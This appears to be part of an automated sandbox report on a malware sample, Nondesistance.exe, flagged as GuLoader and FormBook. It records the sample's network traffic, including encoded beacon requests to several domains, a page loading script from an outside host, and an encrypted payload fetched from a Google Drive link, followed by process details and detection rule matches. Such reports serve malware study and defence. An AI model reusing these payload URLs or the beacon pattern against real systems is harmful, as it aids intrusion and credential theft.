                                                                                                May 27, 2024 12:39:04.563126087 CEST477OUTGET /udud/?78wx=IVkh-DpXGR&Pl9P8ldX=s4Vg1LN8KF8xRZjsTtx1ePAa6rrZ5tQl+fVkjM0Cwqz81ntfAq/M/gVPDnM69uqRMv9oQTSMlpkV8bcLOwxh9sPoo9S5h5afGeOqgp9TfQfssWCdBUAOLW8= HTTP/1.1
                                                                                                Host: www.gaglianoart.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:39:04.751271963 CEST293INHTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:39:04 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 66 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 67 6c 69 61 6e 6f 61 72 74 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7<html>9 <head>4f <meta http-equiv='refresh' content='0; url=http://www.gaglianoart.com/' />a </head>8</html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                100192.168.11.3049935162.209.189.15280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:39:10.080826044 CEST192INHTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                101192.168.11.3049936208.112.85.15080
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:39:15.195832014 CEST478OUTGET /udud/?78wx=IVkh-DpXGR&Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo= HTTP/1.1
                                                                                                Host: www.fivetownsjcc.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:39:15.303596020 CEST383INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:38:55 GMT
                                                                                                Server: Apache
                                                                                                X-SERVER: 3908
                                                                                                Content-Length: 203
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 64 75 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                102192.168.11.3049937208.112.85.15080
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:39:25.582551956 CEST481OUTGET /udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.fivetownsjcc.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:39:25.689292908 CEST383INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:39:05 GMT
                                                                                                Server: Apache
                                                                                                X-SERVER: 3908
                                                                                                Content-Length: 203
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 64 75 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>


                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.11.3049827142.251.16.101443772C:\Users\user\Desktop\Nondesistance.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-05-27 10:30:45 UTC216OUTGET /uc?export=download&id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                Host: drive.google.com
                                                                                                Cache-Control: no-cache
                                                                                                2024-05-27 10:30:46 UTC1582INHTTP/1.1 303 See Other
                                                                                                Content-Type: application/binary
                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                Date: Mon, 27 May 2024 10:30:46 GMT
                                                                                                Location: https://drive.usercontent.google.com/download?id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm&export=download
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                Content-Security-Policy: script-src 'nonce-SZTWUdeK99D1mW4lMMhMzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                Server: ESF
                                                                                                Content-Length: 0
                                                                                                X-XSS-Protection: 0
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.11.3049828172.253.62.132443772C:\Users\user\Desktop\Nondesistance.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-05-27 10:30:46 UTC258OUTGET /download?id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm&export=download HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                Cache-Control: no-cache
                                                                                                Host: drive.usercontent.google.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-05-27 10:30:47 UTC4804INHTTP/1.1 200 OK
                                                                                                Content-Type: application/octet-stream
                                                                                                Content-Security-Policy: sandbox
                                                                                                Content-Security-Policy: default-src 'none'
                                                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                                                X-Content-Security-Policy: sandbox
                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                Cross-Origin-Resource-Policy: same-site
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Content-Disposition: attachment; filename="zkNkZYUN98.bin"
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Access-Control-Allow-Credentials: false
                                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Dom [TRUNCATED]
                                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                Accept-Ranges: bytes
                                                                                                Content-Length: 269888
                                                                                                Last-Modified: Thu, 23 May 2024 10:54:35 GMT
                                                                                                X-GUploader-UploadID: ABPtcPpVfAK6Jz8kHnGnPjE47aew-zpYdUIPDPiP-FokqpnlzEpub4ZVyxKdP1JFjqHNDri5HVY
                                                                                                Date: Mon, 27 May 2024 10:30:46 GMT
                                                                                                Expires: Mon, 27 May 2024 10:30:46 GMT
                                                                                                Cache-Control: private, max-age=0
                                                                                                X-Goog-Hash: crc32c=UDgTRA==
                                                                                                Server: UploadServer
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close
                                                                                                2024-05-27 10:30:47 UTC4804INData Raw: ca 7b 87 30 e4 b9 fe 81 fd 16 33 ab d9 a7 af 89 53 98 52 f8 9d 83 7a 88 75 de 62 95 76 9d 69 a8 c1 bd 81 33 23 b3 06 2f 4e 7c 8a 20 f4 84 8b d0 f1 59 1d d9 a9 b7 d3 e0 1a 4a ae 3c ba 47 c2 5b 35 2a ed 37 63 3c 61 4e af bf f4 f7 6b ed 23 1d 47 df 96 16 9d 4c ae 2f 9e c6 25 2e 82 01 51 4f 65 bc ba d3 af 48 ff 81 44 e5 1e db 30 fe bd d9 d2 94 cc eb f7 5e cd 87 c4 8c 80 7c 86 e5 ee c9 fa fd a7 87 c8 e7 91 c7 2a 25 9f c0 96 11 03 1e 97 5e 57 dc 8a 54 aa f1 b4 4a 22 e1 47 c2 69 ae 6d 68 a7 c0 da d4 67 c8 d0 c2 34 52 59 5a 57 f2 fc 46 bd c3 c7 bb d9 dc 9c c0 1d ff 55 4f 14 c5 a0 ff ef 36 27 75 0b c6 96 6a 80 de 80 6d 18 35 72 99 70 44 f6 f3 2b de aa 28 12 41 0b 05 c8 ad d9 7a 66 77 59 b8 77 92 ac 6c 99 6d 45 f3 72 17 76 0b d5 5a f9 29 4b 6b 5a 96 e2 f5 54 ec 48
                                                                                                Data Ascii: {03SRzubvi3#/N| YJ<G[5*7c<aNk#GL/%.QOeHD0^|*%^WTJ"Gimhg4RYZWFUO6'ujm5rpD+(AzfwYwlmErvZ)KkZTH
                                                                                                2024-05-27 10:30:47 UTC4804INData Raw: 17 c7 72 45 24 a3 14 7b 7b 4d 9a 1a e1 12 76 52 59 ff 42 7f 4c 74 57 81 7e d0 2b b1 1b 06 fd ba dc 14 b1 e5 5b 3a d2 74 c3 74 d7 09 49 7e 6e 1d 8c 74 ce 09 3e ab 62 12 d0 b0 d3 88 a3 f8 75 68 b8 71 ea 05 e6 f0 0d 4f 4e bd b0 d1 71 d9 39 dd 9b e0 c5 20 75 31 7d ee 59 9e 4f 94 46 89 2f e6 b8 6e 5b 7b 2e 58 df 12 a1 0e 13 d4 bf 9c 52 ce d5 83 57 17 54 2d e2 e2 19 1e 48 37 13 7a 8b a4 a3 b8 cd 38 65 90 13 86 5d 0d fe a6 6e c0 09 2c 52 82 f7 5e 88 76 05 f5 65 a0 da 44 40 2a 19 97 1f 58 e2 b5 20 6a d7 09 a0 64 2e 49 98 3f 04 1f 4d b3 8b 02 38 89 53 c0 65 51 4a a1 6a 51 60 e0 ef 61 83 bf a5 8c e0 4f fd 84 e5 32 9c 5c d5 8d c3 6d a4 3a e5 8e 09 e3 20 65 db f4 ec 60 e6 aa 80 bd aa 48 63 6b f4 95 85 ac 3e 32 2a b9 3a a4 87 43 88 ba de f4 e5 88 b3 63 e1 8d d2 d5 17
                                                                                                Data Ascii: rE${{MvRYBLtW~+[:ttI~nt>buhqONq9 u1}YOF/n[{.XRWT-H7z8e]n,R^veD@*X jd.I?M8SeQJjQ`aO2\m: e`Hck>2*:Cc
                                                                                                2024-05-27 10:30:47 UTC290INData Raw: bd bd 01 39 74 a8 6c c7 5b 5d 9d 0d fb 38 8d 68 fa e3 82 d0 f7 04 85 22 4d 38 82 db fe 11 84 9e 8c 30 20 10 c0 6f 9d ad 60 75 74 49 ee fc 7a 57 ee f9 4a 3d 6b fa 21 21 3a c6 37 0c 9a 52 ff 56 16 a4 a4 49 64 d1 bd ff 94 90 93 42 d0 96 82 2d 1f 5a 58 2c 1f 22 c9 a5 f0 c7 ac 4d 4b b7 30 24 83 2b c8 a1 3f a8 f6 62 db 4a 22 fe 8d bf 70 a8 65 84 70 24 b2 e5 92 83 a4 10 7e eb 9e 3f 20 8a 0d fc 7a c6 2e 4c c3 a6 0b a2 7a 4e 4c bf c9 57 6d ee 43 ff 81 c9 ac 1e 63 9b 54 17 f3 25 7a 0d 11 f2 d5 3f 46 2a 93 83 8e 4b 08 57 9e a5 e2 1d 62 ce de 03 0a 0b 9d 9e 34 b0 90 59 9c 09 c4 74 7d 39 c1 c8 08 1f e6 eb 9d 25 66 72 2a a0 4e 87 a5 fa 1d 5b c0 f0 ab ca ca 9e ab a4 fd 66 c2 18 5c ea 3d 0e 17 53 df 1e 25 20 a2 af 1a 97 fe e6 29 c0 3e 6c 35 26 43 e7 95 3c 32 9f c9 9f d0
                                                                                                Data Ascii: 9tl[]8h"M80 o`utIzWJ=k!!:7RVIdB-ZX,"MK0$+?bJ"pep$~? z.LzNLWmCcT%z?F*KWb4Yt}9%fr*N[f\=S% )>l5&C<2
                                                                                                2024-05-27 10:30:47 UTC1255INData Raw: 8d 6f 6b 0a d3 e2 76 e0 b8 46 97 f5 18 71 30 4f 81 d7 97 33 70 f2 cf 83 a2 cc 9f 9b 5c d4 35 ac 13 4f ed dc 37 27 92 0f 5d 69 98 88 9d 3d cf b1 ed cd 50 9f 85 11 d7 b2 4a a3 e2 12 60 4c f8 41 6f f7 29 08 80 09 f7 82 19 e1 26 a8 51 ba 26 c1 8f 00 0c c7 2a 2a db f1 13 fe 66 ea ac 13 3d 0c d7 98 c9 96 ee 53 b7 f1 3b 03 4f 69 81 45 d1 35 a3 eb af 22 23 d8 1b ad 66 a8 4c 3d b1 cc 68 ad ff b9 a8 00 8b 4b f9 21 34 26 43 fc 57 a3 cb 9a ea cf f7 b0 20 4c 75 44 50 04 67 ae 78 c3 b8 d8 5f 8a 84 33 38 84 f8 58 91 b4 30 99 23 ce 9b 61 3d fb 02 26 cd f5 78 4b 27 e4 94 65 ca 5f 71 f1 4c 58 f0 12 5b c3 2d dd ce 18 04 08 98 fe 2c 34 55 8d cf c3 27 d3 4d b9 7d 8b 55 99 ba fb a8 b9 64 3e 8b a9 59 e1 25 e7 2d b5 bf 6a b7 a3 3a 7d d1 84 0f 52 2b ef 08 a8 ab 5d 69 42 37 86 16
                                                                                                Data Ascii: okvFq0O3p\5O7']i=PJ`LAo)&Q&**f=S;OiE5"#fL=hK!4&CW LuDPgx_38X0#a=&xK'e_qLX[-,4U'M}Ud>Y%-j:}R+]iB7
                                                                                                2024-05-27 10:30:47 UTC63INData Raw: cc 83 b5 b5 23 c5 08 81 e3 5b 08 36 0c cc 0a 0b e1 43 35 9b 67 57 76 44 3f 77 ac f8 85 91 c1 d5 27 ba 21 26 ac 07 42 e1 5a ca ea 38 ef 67 51 4f e0 37 72 1d ad 3d 5c 72 11 2e 49 28 4c d7 5d
                                                                                                Data Ascii: #[6C5gWvD?w'!&BZ8gQO7r=\r.I(L]
                                                                                                2024-05-27 10:30:47 UTC1255INData Raw: 42 01 f2 e0 56 b5 61 28 66 01 b7 96 1a ae b5 55 ab 0a 5f d0 0d 45 66 31 83 fe 22 b3 47 49 8d c6 af 8d 62 c7 da 8d e9 5c c3 dc 32 f4 69 30 5e 62 fe 05 79 c1 7c aa 48 ec fd c3 5c 17 05 92 94 25 0a d3 ed 71 89 ed 49 db 3b 3c b8 3e a1 3f 99 d6 b8 0d 6a fc 9b 60 fb 31 18 a9 98 54 aa 98 bd 2c 8a 83 8e ca 50 47 38 fc 32 1d 43 f9 b3 f1 1d 5b 10 6c 13 40 8b 24 4a 95 d4 98 03 64 c4 2d f7 29 0a 8e 4b e1 30 d5 f5 2a 31 6a 08 54 b2 f0 5a e2 d8 29 d8 16 e7 f4 49 0c 2d ad 10 c0 0f 5c d1 cc 77 74 90 08 af 5d a0 20 7f cc 65 81 56 4c 0d 6e 72 73 37 1d 68 5f 48 bc bc 60 00 96 6a bd 97 b4 e8 48 84 3d 2b 83 d2 1c a2 18 b8 a3 ee 36 ef 24 99 31 4c e3 17 50 94 36 46 09 34 b6 e4 6a 29 0f 8c 36 f3 c9 dc aa 23 fc 39 b5 52 b1 3d e0 33 39 f6 4c 25 ac 97 50 35 ee 38 89 11 df b7 0f ed
                                                                                                Data Ascii: BVa(fU_Ef1"GIb\2i0^by|H\%qI;<>?j`1T,PG82C[l@$Jd-)K0*1jTZ)I-\wt] eVLnrs7h_H`jH=+6$1LP6F4j)6#9R=39L%P58
                                                                                                2024-05-27 10:30:47 UTC1255INData Raw: 52 a9 a9 ac 93 73 25 2c 8b 07 ab 3b 53 6c 30 0b 3d 38 60 7b da 20 a2 97 76 d8 a6 03 37 29 39 d3 63 91 e9 aa 65 bc ba 80 f9 1f 46 d6 44 e5 1e 64 42 e6 bd d9 6c 89 ff eb f7 e4 08 d8 c4 8c 3b 6b 3e e5 ee 44 6f e2 1d 89 c8 d0 60 1d 04 d2 5d c6 2e c7 de 23 02 95 65 ad f8 3b 77 fe d5 27 02 b9 ec a3 4b 0b 51 3d 3d 2e 05 1e d9 56 7d 83 ad 9d dc ef 01 59 6b e8 36 b9 ea 4c a1 3b 8b 1b f6 f6 d8 eb 30 c5 d9 fe e6 1d e5 9d f0 28 5b f4 18 d2 3c f2 32 b4 68 3f a5 ad 75 df 3e 2d b0 a5 77 0a fa a9 63 92 34 3d 0c 6e 66 55 14 f3 73 39 bd 86 bf 99 ad 83 10 6d b3 ad 12 e8 b1 68 81 11 23 1d 07 ee 8b 56 bc 64 fa a4 bb b4 2e 9d f2 fb 2f 67 95 12 7a f0 e4 36 08 24 57 67 42 ad c9 28 25 60 7a cc 77 1e 37 a5 52 b3 a5 6f e5 3e 4c 82 9a 70 69 18 12 c8 c8 15 8c 8b 7c e0 3b e5 7e b0 e8
                                                                                                Data Ascii: Rs%,;Sl0=8`{ v7)9ceFDdBl;k>Do`].#e;w'KQ==.V}Yk6L;0([<2h?u>-wc4=nfUs9mh#Vd./gz6$WgB(%`zw7Ro>Lpi|;~
                                                                                                2024-05-27 10:30:47 UTC1255INData Raw: 21 cc 0d e7 e5 7f 4b 0c bc b3 13 90 88 19 41 89 6d 03 f5 bb f7 22 b1 3e 9b 45 2b c5 bd 6f 78 10 be bd 05 0f 00 51 0c 45 89 d6 20 68 72 c3 54 43 cf 67 56 ae 1a 94 57 a8 3c f3 09 28 9b 76 33 11 a4 67 a9 f9 28 cd 51 11 ee 11 39 de 11 49 5d ea c5 21 33 b8 92 e7 3e a5 31 31 c1 c3 f9 c0 da 39 1f 39 65 b0 a0 58 80 c6 46 24 67 e4 b1 ca 35 f4 ee ce db 5b 5d c4 ed 7a a0 37 34 78 c1 6a be 31 89 c1 f4 67 8b 1f ab 8f 4e ea 44 ee eb 16 f3 ad 70 d0 ee 25 eb 71 72 3e 58 9e a6 17 3d 1a b4 12 a6 70 ef 58 43 1b a9 0a 31 ed 49 1c b6 3a bd d9 d2 94 cc eb f7 99 4b 5b c4 8c 80 33 9d 88 29 0e 72 3a 1d 89 c8 1a 3b 67 cc 5a 18 74 5b 30 57 37 5d 40 b0 6b 7e cf cd 83 d5 16 a1 ef e1 2d c1 75 19 48 c5 f3 12 1f ec 59 0f 28 9e 76 97 dd 89 b6 b5 29 d6 10 28 8d 91 da ca c9 26 ba 45 40 92
                                                                                                Data Ascii: !KAm">E+oxQE hrTCgVW<(v3g(Q9I]!3>1199eXF$g5[]z74xj1gNDp%qr>X=pXC1I:K[3)r:;gZt[0W7]@k~-uHY(v)(&E@
                                                                                                2024-05-27 10:30:47 UTC1255INData Raw: da 1e 26 9a 49 25 2f 8b 26 20 e6 f8 76 ed 5c ac 17 fa 70 95 e4 da ed af fb 2b 3a cb b4 58 4e 45 f0 52 ef 27 86 a2 f0 31 65 71 ae df c5 fc 1c 29 d4 fa 45 1f 58 dd 11 df a8 ad 4a 14 07 41 79 2a e7 73 d9 8d e9 f5 c1 68 cd 59 d0 d7 74 b0 75 2a 54 4b 62 d5 26 ff 41 8e 4f f3 73 42 ae 33 64 c8 dc 23 83 b4 c3 a2 bb 06 56 dd 55 9f c7 0e f9 95 6b ca 1a 8b 00 f5 80 3b ac 38 2a b8 24 38 57 15 ca 5d 6f 44 7a f0 75 e1 67 9f 43 62 97 20 72 3e 72 b7 1e 1d 51 a5 5a f6 48 0f 7e 52 8a 98 a8 a3 93 a1 c9 d7 36 55 f4 63 1e 1d 32 c3 7f ad 52 ab 46 23 bd 17 81 60 6c 1b a8 ef 5e f3 ad 9b 42 ef f0 46 a4 48 44 15 1c ca d2 53 0f cb ae 52 61 92 e3 c2 49 bc 95 51 73 7b 35 6f d5 c1 63 a1 a1 87 7a c6 ae cd 4a 95 b7 cd 13 a6 1f b5 67 a5 2f 6f 53 59 87 0a 87 1d 76 e6 34 c7 7b 4c aa c8 a3
                                                                                                Data Ascii: &I%/& v\p+:XNER'1eq)EXJAy*shYtu*TKb&AOsB3d#VUk;8*$8W]oDzugCb r>rQZH~R6Uc2RF#`l^BFHDSRaIQs{5oczJg/oSYv4{L
                                                                                                2024-05-27 10:30:47 UTC1255INData Raw: 7d fd a5 5f c4 90 6e f1 04 b4 28 c2 00 83 f4 95 82 4f 7e 68 c1 fd 0a 9b ca 17 e3 5e 24 b9 4f 50 8f 81 77 0d 85 74 ab 56 85 9d 0d c4 6c cd b3 1d af d8 67 b7 e4 aa 88 9b 41 30 c0 65 f4 10 32 1f 35 f5 4a ce bf e9 ed 41 fb 81 6f 87 af 5b 38 69 b5 d6 18 aa f8 58 d1 70 7e 53 36 b2 c3 f2 c7 3c f5 14 ad 04 3f 1f f0 4f 30 d6 0d ab 95 44 c6 0f 21 33 e0 1d a9 73 30 31 86 f9 4e 50 be 66 dc be dc a9 9f f6 85 4f 72 c4 a5 0e bc cb 57 26 58 23 bc 2c f1 e7 69 34 70 d5 e3 b9 dc 8f 43 80 e7 74 21 6e 73 61 85 3e 5d 33 06 22 6e b0 cc 40 35 fa b8 3a 4e eb 6d 20 28 a3 ee ba c8 aa ab 50 e7 ba eb 82 ca 00 af 28 5b 3d 6b 21 81 b7 72 3d a1 fa 14 3f 83 0b 46 53 cf 97 a5 7b 96 bd 19 bd d1 fa 34 54 69 6b 5f b8 3f 9b ff af 96 26 9b 2d b3 e7 ad 40 4f 21 55 01 6a c0 ad 9f 28 ed 2c 2a 89
                                                                                                Data Ascii: }_n(O~h^$OPwtVlgA0e25JAo[8iXp~S6<?O0D!3s01NPfOrW&X#,i4pCt!nsa>]3"n@5:Nm (P([=k!r=?FS{4Tik_?&-@O!Uj(,*


                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:4
                                                                                                Start time:06:30:17
                                                                                                Start date:27/05/2024
                                                                                                Path:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Nondesistance.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:878'808 bytes
                                                                                                MD5 hash:9695B61F42F2E5A77E2E8D29963FE980
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.20222463111.00000000050BE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:9
                                                                                                Start time:06:30:36
                                                                                                Start date:27/05/2024
                                                                                                Path:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Nondesistance.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:878'808 bytes
                                                                                                MD5 hash:9695B61F42F2E5A77E2E8D29963FE980
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
